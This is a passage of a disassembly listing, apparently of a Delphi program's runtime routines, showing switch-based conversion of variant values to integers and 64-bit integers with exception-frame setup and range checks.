loc_4000F30F: ; CODE XREF: sub_4000F294+74�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
jmp short loc_4000F334
; ---------------------------------------------------------------------------
loc_4000F319: ; DATA XREF: sub_4000F294+59�o
jmp sub_400040D8
; ---------------------------------------------------------------------------
mov eax, [ebp+var_4]
movzx eax, word ptr [eax]
mov dx, 11h
call sub_4000E068
xor ebx, ebx
call sub_40004360
loc_4000F334: ; CODE XREF: sub_4000F294+28�j
; sub_4000F294+42�j ...
mov eax, ebx
pop edi
pop esi
pop ebx
pop ecx
pop ebp
retn
sub_4000F294 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000F33C proc near ; CODE XREF: sub_4000E9CC+D2�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
movzx eax, word ptr [eax]
cmp eax, 11h ; switch 18 cases
ja loc_4000F3D6 ; default
; jumptable 4000F35C cases 3-10,12-15
movzx eax, ds:byte_4000F363[eax]
jmp ds:off_4000F375[eax*4] ; switch jump
; ---------------------------------------------------------------------------
byte_4000F363 db 1, 2, 3, 0 ; DATA XREF: sub_4000F33C+19�r
db 0, 0, 0, 0 ; indirect table for switch statement
db 0, 0, 0, 4
db 0, 0, 0, 0
db 5, 6
off_4000F375 dd offset loc_4000F3D6 ; DATA XREF: sub_4000F33C+20�r
dd offset loc_4000F391 ; jump table for switch statement
dd offset loc_4000F398
dd offset loc_4000F3B2
dd offset loc_4000F3BB
dd offset loc_4000F3C4
dd offset loc_4000F3CD
; ---------------------------------------------------------------------------
loc_4000F391: ; CODE XREF: sub_4000F33C+20�j
; DATA XREF: sub_4000F33C:off_4000F375�o
xor ebx, ebx ; jumptable 4000F35C case 0
jmp loc_4000F42C
; ---------------------------------------------------------------------------
loc_4000F398: ; CODE XREF: sub_4000F33C+20�j
; DATA XREF: sub_4000F33C:off_4000F375�o
cmp byte_4001AA10, 0 ; jumptable 4000F35C case 1
jz short loc_4000F3AE
mov dx, 2
mov ax, 1
call sub_4000DBF4
loc_4000F3AE: ; CODE XREF: sub_4000F33C+63�j
xor ebx, ebx
jmp short loc_4000F42C
; ---------------------------------------------------------------------------
loc_4000F3B2: ; CODE XREF: sub_4000F33C+20�j
; DATA XREF: sub_4000F33C:off_4000F375�o
mov ebx, [ebp+var_4] ; jumptable 4000F35C case 2
movzx ebx, word ptr [ebx+8]
jmp short loc_4000F42C
; ---------------------------------------------------------------------------
loc_4000F3BB: ; CODE XREF: sub_4000F33C+20�j
; DATA XREF: sub_4000F33C:off_4000F375�o
mov ebx, [ebp+var_4] ; jumptable 4000F35C case 11
movzx ebx, word ptr [ebx+8]
jmp short loc_4000F42C
; ---------------------------------------------------------------------------
loc_4000F3C4: ; CODE XREF: sub_4000F33C+20�j
; DATA XREF: sub_4000F33C:off_4000F375�o
mov ebx, [ebp+var_4] ; jumptable 4000F35C case 16
movsx ebx, byte ptr [ebx+8]
jmp short loc_4000F42C
; ---------------------------------------------------------------------------
loc_4000F3CD: ; CODE XREF: sub_4000F33C+20�j
; DATA XREF: sub_4000F33C:off_4000F375�o
mov ebx, [ebp+var_4] ; jumptable 4000F35C case 17
movzx ebx, byte ptr [ebx+8]
jmp short loc_4000F42C
; ---------------------------------------------------------------------------
loc_4000F3D6: ; CODE XREF: sub_4000F33C+13�j
; sub_4000F33C+20�j
; DATA XREF: ...
xor eax, eax ; default
; jumptable 4000F35C cases 3-10,12-15
push ebp
push offset loc_4000F411
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+var_4]
call sub_4000ED90
mov ebx, eax
add ebx, 8000h
cmp ebx, 0FFFFh
jbe short loc_4000F401
call sub_40003C64
; ---------------------------------------------------------------------------
loc_4000F401: ; CODE XREF: sub_4000F33C+BE�j
add ebx, 0FFFF8000h
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
jmp short loc_4000F42C
; ---------------------------------------------------------------------------
loc_4000F411: ; DATA XREF: sub_4000F33C+9D�o
jmp sub_400040D8
; ---------------------------------------------------------------------------
mov eax, [ebp+var_4]
movzx eax, word ptr [eax]
mov dx, 2
call sub_4000E068
xor ebx, ebx
call sub_40004360
loc_4000F42C: ; CODE XREF: sub_4000F33C+57�j
; sub_4000F33C+74�j ...
mov eax, ebx
pop edi
pop esi
pop ebx
pop ecx
pop ebp
retn
sub_4000F33C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000F434 proc near ; CODE XREF: sub_4000E9CC+1AE�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
movzx eax, word ptr [eax]
cmp eax, 12h ; switch 19 cases
ja short loc_4000F4BB ; default
; jumptable 4000F450 cases 2-10,12-16
movzx eax, ds:byte_4000F457[eax]
jmp ds:off_4000F46A[eax*4] ; switch jump
; ---------------------------------------------------------------------------
byte_4000F457 db 1, 2, 0, 0 ; DATA XREF: sub_4000F434+15�r
db 0, 0, 0, 0 ; indirect table for switch statement
db 0, 0, 0, 3
db 0, 0, 0, 0
db 0, 4, 5
off_4000F46A dd offset loc_4000F4BB ; DATA XREF: sub_4000F434+1C�r
dd offset loc_4000F482 ; jump table for switch statement
dd offset loc_4000F486
dd offset loc_4000F4A0
dd offset loc_4000F4A9
dd offset loc_4000F4B2
; ---------------------------------------------------------------------------
loc_4000F482: ; CODE XREF: sub_4000F434+1C�j
; DATA XREF: sub_4000F434:off_4000F46A�o
xor ebx, ebx ; jumptable 4000F450 case 0
jmp short loc_4000F505
; ---------------------------------------------------------------------------
loc_4000F486: ; CODE XREF: sub_4000F434+1C�j
; DATA XREF: sub_4000F434:off_4000F46A�o
cmp byte_4001AA10, 0 ; jumptable 4000F450 case 1
jz short loc_4000F49C
mov dx, 12h
mov ax, 1
call sub_4000DBF4
loc_4000F49C: ; CODE XREF: sub_4000F434+59�j
xor ebx, ebx
jmp short loc_4000F505
; ---------------------------------------------------------------------------
loc_4000F4A0: ; CODE XREF: sub_4000F434+1C�j
; DATA XREF: sub_4000F434:off_4000F46A�o
mov ebx, [ebp+var_4] ; jumptable 4000F450 case 11
movzx ebx, word ptr [ebx+8]
jmp short loc_4000F505
; ---------------------------------------------------------------------------
loc_4000F4A9: ; CODE XREF: sub_4000F434+1C�j
; DATA XREF: sub_4000F434:off_4000F46A�o
mov ebx, [ebp+var_4] ; jumptable 4000F450 case 17
movzx ebx, byte ptr [ebx+8]
jmp short loc_4000F505
; ---------------------------------------------------------------------------
loc_4000F4B2: ; CODE XREF: sub_4000F434+1C�j
; DATA XREF: sub_4000F434:off_4000F46A�o
mov ebx, [ebp+var_4] ; jumptable 4000F450 case 18
movzx ebx, word ptr [ebx+8]
jmp short loc_4000F505
; ---------------------------------------------------------------------------
loc_4000F4BB: ; CODE XREF: sub_4000F434+13�j
; sub_4000F434+1C�j
; DATA XREF: ...
xor eax, eax ; default
; jumptable 4000F450 cases 2-10,12-16
push ebp
push offset loc_4000F4EA
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+var_4]
call sub_4000ED90
mov ebx, eax
cmp ebx, 0FFFFh
jbe short loc_4000F4E0
call sub_40003C64
; ---------------------------------------------------------------------------
loc_4000F4E0: ; CODE XREF: sub_4000F434+A5�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
jmp short loc_4000F505
; ---------------------------------------------------------------------------
loc_4000F4EA: ; DATA XREF: sub_4000F434+8A�o
jmp sub_400040D8
; ---------------------------------------------------------------------------
mov eax, [ebp+var_4]
movzx eax, word ptr [eax]
mov dx, 12h
call sub_4000E068
xor ebx, ebx
call sub_40004360
loc_4000F505: ; CODE XREF: sub_4000F434+50�j
; sub_4000F434+6A�j ...
mov eax, ebx
pop edi
pop esi
pop ebx
pop ecx
pop ebp
retn
sub_4000F434 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000F510 proc near ; CODE XREF: sub_4000E9CC+1C0�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
movzx eax, word ptr [eax]
cmp eax, 13h ; switch 20 cases
ja loc_4000F5AB ; default
; jumptable 4000F530 cases 2-10,12-16
movzx eax, ds:byte_4000F537[eax]
jmp ds:off_4000F54B[eax*4] ; switch jump
; ---------------------------------------------------------------------------
byte_4000F537 db 1, 2, 0, 0 ; DATA XREF: sub_4000F510+19�r
db 0, 0, 0, 0 ; indirect table for switch statement
db 0, 0, 0, 3
db 0, 0, 0, 0
db 0, 4, 5, 6
off_4000F54B dd offset loc_4000F5AB ; DATA XREF: sub_4000F510+20�r
dd offset loc_4000F567 ; jump table for switch statement
dd offset loc_4000F56E
dd offset loc_4000F588
dd offset loc_4000F591
dd offset loc_4000F59A
dd offset loc_4000F5A3
; ---------------------------------------------------------------------------
loc_4000F567: ; CODE XREF: sub_4000F510+20�j
; DATA XREF: sub_4000F510:off_4000F54B�o
xor ebx, ebx ; jumptable 4000F530 case 0
jmp loc_4000F5F1
; ---------------------------------------------------------------------------
loc_4000F56E: ; CODE XREF: sub_4000F510+20�j
; DATA XREF: sub_4000F510:off_4000F54B�o
cmp byte_4001AA10, 0 ; jumptable 4000F530 case 1
jz short loc_4000F584
mov dx, 13h
mov ax, 1
call sub_4000DBF4
loc_4000F584: ; CODE XREF: sub_4000F510+65�j
xor ebx, ebx
jmp short loc_4000F5F1
; ---------------------------------------------------------------------------
loc_4000F588: ; CODE XREF: sub_4000F510+20�j
; DATA XREF: sub_4000F510:off_4000F54B�o
mov ebx, [ebp+var_4] ; jumptable 4000F530 case 11
movsx ebx, word ptr [ebx+8]
jmp short loc_4000F5F1
; ---------------------------------------------------------------------------
loc_4000F591: ; CODE XREF: sub_4000F510+20�j
; DATA XREF: sub_4000F510:off_4000F54B�o
mov ebx, [ebp+var_4] ; jumptable 4000F530 case 17
movzx ebx, byte ptr [ebx+8]
jmp short loc_4000F5F1
; ---------------------------------------------------------------------------
loc_4000F59A: ; CODE XREF: sub_4000F510+20�j
; DATA XREF: sub_4000F510:off_4000F54B�o
mov ebx, [ebp+var_4] ; jumptable 4000F530 case 18
movzx ebx, word ptr [ebx+8]
jmp short loc_4000F5F1
; ---------------------------------------------------------------------------
loc_4000F5A3: ; CODE XREF: sub_4000F510+20�j
; DATA XREF: sub_4000F510:off_4000F54B�o
mov ebx, [ebp+var_4] ; jumptable 4000F530 case 19
mov ebx, [ebx+8]
jmp short loc_4000F5F1
; ---------------------------------------------------------------------------
loc_4000F5AB: ; CODE XREF: sub_4000F510+13�j
; sub_4000F510+20�j
; DATA XREF: ...
xor eax, eax ; default
; jumptable 4000F530 cases 2-10,12-16
push ebp
push offset loc_4000F5D6
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+var_4]
call sub_4000F860
test edx, edx
jz short loc_4000F5CA
call sub_40003C64
; ---------------------------------------------------------------------------
loc_4000F5CA: ; CODE XREF: sub_4000F510+B3�j
mov ebx, eax
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
jmp short loc_4000F5F1
; ---------------------------------------------------------------------------
loc_4000F5D6: ; DATA XREF: sub_4000F510+9E�o
jmp sub_400040D8
; ---------------------------------------------------------------------------
mov eax, [ebp+var_4]
movzx eax, word ptr [eax]
mov dx, 13h
call sub_4000E068
xor ebx, ebx
call sub_40004360
loc_4000F5F1: ; CODE XREF: sub_4000F510+59�j
; sub_4000F510+76�j ...
mov eax, ebx
pop edi
pop esi
pop ebx
pop ecx
pop ebp
retn
sub_4000F510 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000F5FC proc near ; CODE XREF: sub_4000F860+1E7�p
; sub_4000F860+3D8�p ...
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_C = qword ptr -0Ch
push ebx
add esp, 0FFFFFFE8h
mov ebx, eax
lea eax, [esp+1Ch+var_14]
push eax
call sub_4000CDD8
push 3
push 0
push 400h
push ebx
lea eax, [esp+2Ch+var_14]
push eax
mov eax, off_4001B064
mov eax, [eax]
call eax
test eax, eax
jnz short loc_4000F636
mov eax, dword ptr [esp+1Ch+var_C]
cdq
mov [esp+1Ch+var_1C], eax
mov [esp+1Ch+var_18], edx
jmp short loc_4000F69B
; ---------------------------------------------------------------------------
loc_4000F636: ; CODE XREF: sub_4000F5FC+2A�j
push 5
push 0
push 400h
push ebx
lea eax, [esp+2Ch+var_14]
push eax
mov eax, off_4001B064
mov eax, [eax]
call eax
test eax, eax
jnz short loc_4000F664
fld [esp+1Ch+var_C]
call sub_400030A8
mov [esp+1Ch+var_1C], eax
mov [esp+1Ch+var_18], edx
jmp short loc_4000F69B
; ---------------------------------------------------------------------------
loc_4000F664: ; CODE XREF: sub_4000F5FC+54�j
cmp eax, 80020005h
jnz short loc_4000F680
mov eax, ebx
call sub_4000FE58
and eax, 7Fh
xor edx, edx
mov [esp+1Ch+var_1C], eax
mov [esp+1Ch+var_18], edx
jmp short loc_4000F69B
; ---------------------------------------------------------------------------
loc_4000F680: ; CODE XREF: sub_4000F5FC+6D�j
movzx edx, word ptr [ebx]
mov cx, 14h
call sub_4000E034
mov [esp+1Ch+var_1C], 0
mov [esp+1Ch+var_18], 0
loc_4000F69B: ; CODE XREF: sub_4000F5FC+38�j
; sub_4000F5FC+66�j ...
mov eax, [esp+1Ch+var_1C]
mov edx, [esp+1Ch+var_18]
add esp, 18h
pop ebx
retn
sub_4000F5FC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000F6A8 proc near ; CODE XREF: sub_4000F860+149�p
; sub_4000F860+20D�p ...
var_24 = dword ptr -24h
var_20 = qword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFDCh
push ebx
xor edx, edx
mov [ebp+var_24], edx
mov [ebp+var_4], edx
mov ebx, eax
xor eax, eax
push ebp
push offset loc_4000F796
push dword ptr fs:[eax]
mov fs:[eax], esp
mov edx, ebx
lea eax, [ebp+var_4]
call sub_40011DFC
lea eax, [ebp+var_24]
mov edx, [ebp+var_4]
call sub_40004B0C
mov eax, [ebp+var_24]
lea edx, [ebp+var_10]
call sub_40007E0C
test al, al
jnz loc_4000F778
lea eax, [ebp+var_14]
push eax
push 0
push 400h
mov eax, [ebp+var_4]
push eax
mov eax, off_4001B0B0
mov eax, [eax]
call eax
test eax, eax
jnz short loc_4000F717
mov eax, [ebp+var_14]
cdq
mov [ebp+var_10], eax
mov [ebp+var_C], edx
jmp short loc_4000F778
; ---------------------------------------------------------------------------
loc_4000F717: ; CODE XREF: sub_4000F6A8+61�j
lea eax, [ebp+var_20]
push eax
push 0
push 400h
mov eax, [ebp+var_4]
push eax
mov eax, off_4001AFF0
mov eax, [eax]
call eax
test eax, eax
jnz short loc_4000F743
fld [ebp+var_20]
call sub_400030A8
mov [ebp+var_10], eax
mov [ebp+var_C], edx
jmp short loc_4000F778
; ---------------------------------------------------------------------------
loc_4000F743: ; CODE XREF: sub_4000F6A8+89�j
cmp eax, 80020005h
jnz short loc_4000F75E
mov eax, ebx
call sub_4000FE58
and eax, 7Fh
xor edx, edx
mov [ebp+var_10], eax
mov [ebp+var_C], edx
jmp short loc_4000F778
; ---------------------------------------------------------------------------
loc_4000F75E: ; CODE XREF: sub_4000F6A8+A0�j
movzx edx, word ptr [ebx]
mov cx, 14h
call sub_4000E034
mov [ebp+var_10], 0
mov [ebp+var_C], 0
loc_4000F778: ; CODE XREF: sub_4000F6A8+41�j
; sub_4000F6A8+6D�j ...
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000F79D
loc_4000F785: ; CODE XREF: sub_4000F6A8+F3�j
lea eax, [ebp+var_24]
call sub_40004884
lea eax, [ebp+var_4]
call sub_40005008
retn
; ---------------------------------------------------------------------------
loc_4000F796: ; DATA XREF: sub_4000F6A8+14�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000F785
; ---------------------------------------------------------------------------
loc_4000F79D: ; CODE XREF: sub_4000F6A8+ED�j
; DATA XREF: sub_4000F6A8+D8�o
mov eax, [ebp+var_10]
mov edx, [ebp+var_C]
pop ebx
mov esp, ebp
pop ebp
retn
sub_4000F6A8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000F7A8 proc near ; CODE XREF: sub_4000F860+220�p
var_18 = byte ptr -18h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFE8h
push ebx
mov ebx, eax
lea eax, [ebp+var_18]
push eax
call sub_4000CDD8
xor eax, eax
push ebp
push offset loc_4000F7FF
push dword ptr fs:[eax]
mov fs:[eax], esp
mov edx, ebx
lea eax, [ebp+var_18]
call sub_4000E700
lea eax, [ebp+var_18]
call ds:off_4001F29C
lea eax, [ebp+var_18]
call sub_4000F860
mov [ebp+var_8], eax
mov [ebp+var_4], edx
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000F806
loc_4000F7F6: ; CODE XREF: sub_4000F7A8+5C�j
lea eax, [ebp+var_18]
call sub_4000E3D8
retn
; ---------------------------------------------------------------------------
loc_4000F7FF: ; DATA XREF: sub_4000F7A8+15�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000F7F6
; ---------------------------------------------------------------------------
loc_4000F806: ; CODE XREF: sub_4000F7A8+56�j
; DATA XREF: sub_4000F7A8+49�o
mov eax, [ebp+var_8]
mov edx, [ebp+var_4]
pop ebx
mov esp, ebp
pop ebp
retn
sub_4000F7A8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000F814 proc near ; CODE XREF: sub_4000F860+3EB�p
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
push ebx
push esi
push edi
add esp, 0FFFFFFECh
mov edi, edx
mov esi, eax
mov edx, esp
movzx eax, word ptr [esi]
call sub_40012D98
mov ebx, eax
test bl, bl
jz short loc_4000F856
lea eax, [esp+20h+var_1C]
push eax
call sub_4000CDD8
push 14h
mov ecx, esi
lea edx, [esp+24h+var_1C]
mov eax, [esp+24h+var_20]
mov esi, [eax]
call dword ptr [esi+1Ch]
mov eax, [esp+20h+var_14]
mov [edi], eax
mov eax, [esp+20h+var_10]
mov [edi+4], eax
loc_4000F856: ; CODE XREF: sub_4000F814+18�j
mov eax, ebx
add esp, 14h
pop edi
pop esi
pop ebx
retn
sub_4000F814 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000F860 proc near ; CODE XREF: sub_4000E9CC+1D2�p
; sub_4000F510+AC�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
push ebx
push esi
push edi
mov [ebp+var_4], eax
xor edx, edx
push ebp
push offset loc_4000FC6C
push dword ptr fs:[edx]
mov fs:[edx], esp
mov eax, [ebp+var_4]
movzx eax, word ptr [eax]
movzx edx, ax
cmp edx, 14h ; switch 21 cases
ja loc_4000FA57 ; default
; jumptable 4000F88C cases 10,14,15
jmp ds:off_4000F893[edx*4] ; switch jump
; ---------------------------------------------------------------------------
off_4000F893 dd offset loc_4000F8E7 ; DATA XREF: sub_4000F860+2C�r
dd offset loc_4000F8FA ; jump table for switch statement
dd offset loc_4000F923
dd offset loc_4000F936
dd offset loc_4000F948
dd offset loc_4000F95E
dd offset loc_4000F974
dd offset loc_4000F990
dd offset loc_4000F9A6
dd offset loc_4000FA44
dd offset loc_4000FA57
dd offset loc_4000F9B9
dd offset loc_4000FA2E
dd offset loc_4000FA44
dd offset loc_4000FA57
dd offset loc_4000FA57
dd offset loc_4000F9CC
dd offset loc_4000F9DF
dd offset loc_4000F9F3
dd offset loc_4000FA07
dd offset loc_4000FA1A
; ---------------------------------------------------------------------------
loc_4000F8E7: ; CODE XREF: sub_4000F860+2C�j
; DATA XREF: sub_4000F860:off_4000F893�o
mov [ebp+var_10], 0 ; jumptable 4000F88C case 0
mov [ebp+var_C], 0
jmp loc_4000FC62
; ---------------------------------------------------------------------------
loc_4000F8FA: ; CODE XREF: sub_4000F860+2C�j
; DATA XREF: sub_4000F860:off_4000F893�o
cmp byte_4001AA10, 0 ; jumptable 4000F88C case 1
jz short loc_4000F910
mov dx, 14h
mov ax, 1
call sub_4000DBF4
loc_4000F910: ; CODE XREF: sub_4000F860+A1�j
mov [ebp+var_10], 0
mov [ebp+var_C], 0
jmp loc_4000FC62
; ---------------------------------------------------------------------------
loc_4000F923: ; CODE XREF: sub_4000F860+2C�j
; DATA XREF: sub_4000F860:off_4000F893�o
mov eax, [ebp+var_4] ; jumptable 4000F88C case 2
movsx eax, word ptr [eax+8]
cdq
mov [ebp+var_10], eax
mov [ebp+var_C], edx
jmp loc_4000FC62
; ---------------------------------------------------------------------------
loc_4000F936: ; CODE XREF: sub_4000F860+2C�j
; DATA XREF: sub_4000F860:off_4000F893�o
mov eax, [ebp+var_4] ; jumptable 4000F88C case 3
mov eax, [eax+8]
cdq
mov [ebp+var_10], eax
mov [ebp+var_C], edx
jmp loc_4000FC62
; ---------------------------------------------------------------------------
loc_4000F948: ; CODE XREF: sub_4000F860+2C�j
; DATA XREF: sub_4000F860:off_4000F893�o
mov eax, [ebp+var_4] ; jumptable 4000F88C case 4
fld dword ptr [eax+8]
call sub_400030A8
mov [ebp+var_10], eax
mov [ebp+var_C], edx
jmp loc_4000FC62
; ---------------------------------------------------------------------------
loc_4000F95E: ; CODE XREF: sub_4000F860+2C�j
; DATA XREF: sub_4000F860:off_4000F893�o
mov eax, [ebp+var_4] ; jumptable 4000F88C case 5
fld qword ptr [eax+8]
call sub_400030A8
mov [ebp+var_10], eax
mov [ebp+var_C], edx
jmp loc_4000FC62
; ---------------------------------------------------------------------------
loc_4000F974: ; CODE XREF: sub_4000F860+2C�j
; DATA XREF: sub_4000F860:off_4000F893�o
mov eax, [ebp+var_4] ; jumptable 4000F88C case 6
fild qword ptr [eax+8]
fdiv ds:flt_4000FCA0
call sub_400030A8
mov [ebp+var_10], eax
mov [ebp+var_C], edx
jmp loc_4000FC62
; ---------------------------------------------------------------------------
loc_4000F990: ; CODE XREF: sub_4000F860+2C�j
; DATA XREF: sub_4000F860:off_4000F893�o
mov eax, [ebp+var_4] ; jumptable 4000F88C case 7
fld qword ptr [eax+8]
call sub_400030A8
mov [ebp+var_10], eax
mov [ebp+var_C], edx
jmp loc_4000FC62
; ---------------------------------------------------------------------------
loc_4000F9A6: ; CODE XREF: sub_4000F860+2C�j
; DATA XREF: sub_4000F860:off_4000F893�o
mov eax, [ebp+var_4] ; jumptable 4000F88C case 8
call sub_4000F6A8
mov [ebp+var_10], eax
mov [ebp+var_C], edx
jmp loc_4000FC62
; ---------------------------------------------------------------------------
loc_4000F9B9: ; CODE XREF: sub_4000F860+2C�j
; DATA XREF: sub_4000F860:off_4000F893�o
mov eax, [ebp+var_4] ; jumptable 4000F88C case 11
movsx eax, word ptr [eax+8]
cdq
mov [ebp+var_10], eax
mov [ebp+var_C], edx
jmp loc_4000FC62
; ---------------------------------------------------------------------------
loc_4000F9CC: ; CODE XREF: sub_4000F860+2C�j
; DATA XREF: sub_4000F860:off_4000F893�o
mov eax, [ebp+var_4] ; jumptable 4000F88C case 16
movsx eax, byte ptr [eax+8]
cdq
mov [ebp+var_10], eax
mov [ebp+var_C], edx
jmp loc_4000FC62
; ---------------------------------------------------------------------------
loc_4000F9DF: ; CODE XREF: sub_4000F860+2C�j
; DATA XREF: sub_4000F860:off_4000F893�o
mov eax, [ebp+var_4] ; jumptable 4000F88C case 17
movzx eax, byte ptr [eax+8]
xor edx, edx
mov [ebp+var_10], eax
mov [ebp+var_C], edx
jmp loc_4000FC62
; ---------------------------------------------------------------------------
loc_4000F9F3: ; CODE XREF: sub_4000F860+2C�j
; DATA XREF: sub_4000F860:off_4000F893�o
mov eax, [ebp+var_4] ; jumptable 4000F88C case 18
movzx eax, word ptr [eax+8]
xor edx, edx
mov [ebp+var_10], eax
mov [ebp+var_C], edx
jmp loc_4000FC62
; ---------------------------------------------------------------------------
loc_4000FA07: ; CODE XREF: sub_4000F860+2C�j
; DATA XREF: sub_4000F860:off_4000F893�o
mov eax, [ebp+var_4] ; jumptable 4000F88C case 19
mov eax, [eax+8]
xor edx, edx
mov [ebp+var_10], eax
mov [ebp+var_C], edx
jmp loc_4000FC62
; ---------------------------------------------------------------------------
loc_4000FA1A: ; CODE XREF: sub_4000F860+2C�j
; DATA XREF: sub_4000F860:off_4000F893�o
mov eax, [ebp+var_4] ; jumptable 4000F88C case 20
mov edx, [eax+8]
mov [ebp+var_10], edx
mov edx, [eax+0Ch]
mov [ebp+var_C], edx
jmp loc_4000FC62
; ---------------------------------------------------------------------------
loc_4000FA2E: ; CODE XREF: sub_4000F860+2C�j
; DATA XREF: sub_4000F860:off_4000F893�o
mov eax, [ebp+var_4] ; jumptable 4000F88C case 12
mov eax, [eax+8]
call sub_4000F860
mov [ebp+var_10], eax
mov [ebp+var_C], edx
jmp loc_4000FC62
; ---------------------------------------------------------------------------
loc_4000FA44: ; CODE XREF: sub_4000F860+2C�j
; DATA XREF: sub_4000F860:off_4000F893�o
mov eax, [ebp+var_4] ; jumptable 4000F88C cases 9,13
call sub_4000F5FC
mov [ebp+var_10], eax
mov [ebp+var_C], edx
jmp loc_4000FC62
; ---------------------------------------------------------------------------
loc_4000FA57: ; CODE XREF: sub_4000F860+26�j
; sub_4000F860+2C�j
; DATA XREF: ...
mov edx, [ebp+var_4] ; default
; jumptable 4000F88C cases 10,14,15
mov edx, eax
sub dx, 100h
jz short loc_4000FA6A
dec dx
jz short loc_4000FA7D
jmp short loc_4000FA90
; ---------------------------------------------------------------------------
loc_4000FA6A: ; CODE XREF: sub_4000F860+201�j
mov eax, [ebp+var_4]
call sub_4000F6A8
mov [ebp+var_10], eax
mov [ebp+var_C], edx
jmp loc_4000FC62
; ---------------------------------------------------------------------------
loc_4000FA7D: ; CODE XREF: sub_4000F860+206�j
mov eax, [ebp+var_4]
call sub_4000F7A8
mov [ebp+var_10], eax
mov [ebp+var_C], edx
jmp loc_4000FC62
; ---------------------------------------------------------------------------
loc_4000FA90: ; CODE XREF: sub_4000F860+208�j
mov edx, [ebp+var_4]
test ah, 40h
jz loc_4000FC45
mov edx, [ebp+var_4]
movzx eax, ax
and eax, 0FFFFBFFFh
cmp eax, 14h ; switch 21 cases
ja loc_4000FC35 ; default
; jumptable 4000FAB0 cases 0,1,9,10,13-15
jmp ds:off_4000FAB7[eax*4] ; switch jump
; ---------------------------------------------------------------------------
off_4000FAB7 dd offset loc_4000FC35 ; DATA XREF: sub_4000F860+250�r
dd offset loc_4000FC35 ; jump table for switch statement
dd offset loc_4000FB0B
dd offset loc_4000FB20
dd offset loc_4000FB34
dd offset loc_4000FB4C
dd offset loc_4000FB64
dd offset loc_4000FB82
dd offset loc_4000FB9A
dd offset loc_4000FC35
dd offset loc_4000FC35
dd offset loc_4000FBAD
dd offset loc_4000FC22
dd offset loc_4000FC35
dd offset loc_4000FC35
dd offset loc_4000FC35
dd offset loc_4000FBC2
dd offset loc_4000FBD7
dd offset loc_4000FBEA
dd offset loc_4000FBFD
dd offset loc_4000FC0F
; ---------------------------------------------------------------------------
loc_4000FB0B: ; CODE XREF: sub_4000F860+250�j
; DATA XREF: sub_4000F860:off_4000FAB7�o
mov eax, [ebp+var_4] ; jumptable 4000FAB0 case 2
mov eax, [eax+8]
movsx eax, word ptr [eax]
cdq
mov [ebp+var_10], eax
mov [ebp+var_C], edx
jmp loc_4000FC62
; ---------------------------------------------------------------------------
loc_4000FB20: ; CODE XREF: sub_4000F860+250�j
; DATA XREF: sub_4000F860:off_4000FAB7�o
mov eax, [ebp+var_4] ; jumptable 4000FAB0 case 3
mov eax, [eax+8]
mov eax, [eax]
cdq
mov [ebp+var_10], eax
mov [ebp+var_C], edx
jmp loc_4000FC62
; ---------------------------------------------------------------------------
loc_4000FB34: ; CODE XREF: sub_4000F860+250�j
; DATA XREF: sub_4000F860:off_4000FAB7�o
mov eax, [ebp+var_4] ; jumptable 4000FAB0 case 4
mov eax, [eax+8]
fld dword ptr [eax]
call sub_400030A8
mov [ebp+var_10], eax
mov [ebp+var_C], edx
jmp loc_4000FC62
; ---------------------------------------------------------------------------
loc_4000FB4C: ; CODE XREF: sub_4000F860+250�j
; DATA XREF: sub_4000F860:off_4000FAB7�o
mov eax, [ebp+var_4] ; jumptable 4000FAB0 case 5
mov eax, [eax+8]
fld qword ptr [eax]
call sub_400030A8
mov [ebp+var_10], eax
mov [ebp+var_C], edx
jmp loc_4000FC62
; ---------------------------------------------------------------------------
loc_4000FB64: ; CODE XREF: sub_4000F860+250�j
; DATA XREF: sub_4000F860:off_4000FAB7�o
mov eax, [ebp+var_4] ; jumptable 4000FAB0 case 6
mov eax, [eax+8]
fild qword ptr [eax]
fdiv ds:flt_4000FCA0
call sub_400030A8
mov [ebp+var_10], eax
mov [ebp+var_C], edx
jmp loc_4000FC62
; ---------------------------------------------------------------------------
loc_4000FB82: ; CODE XREF: sub_4000F860+250�j
; DATA XREF: sub_4000F860:off_4000FAB7�o
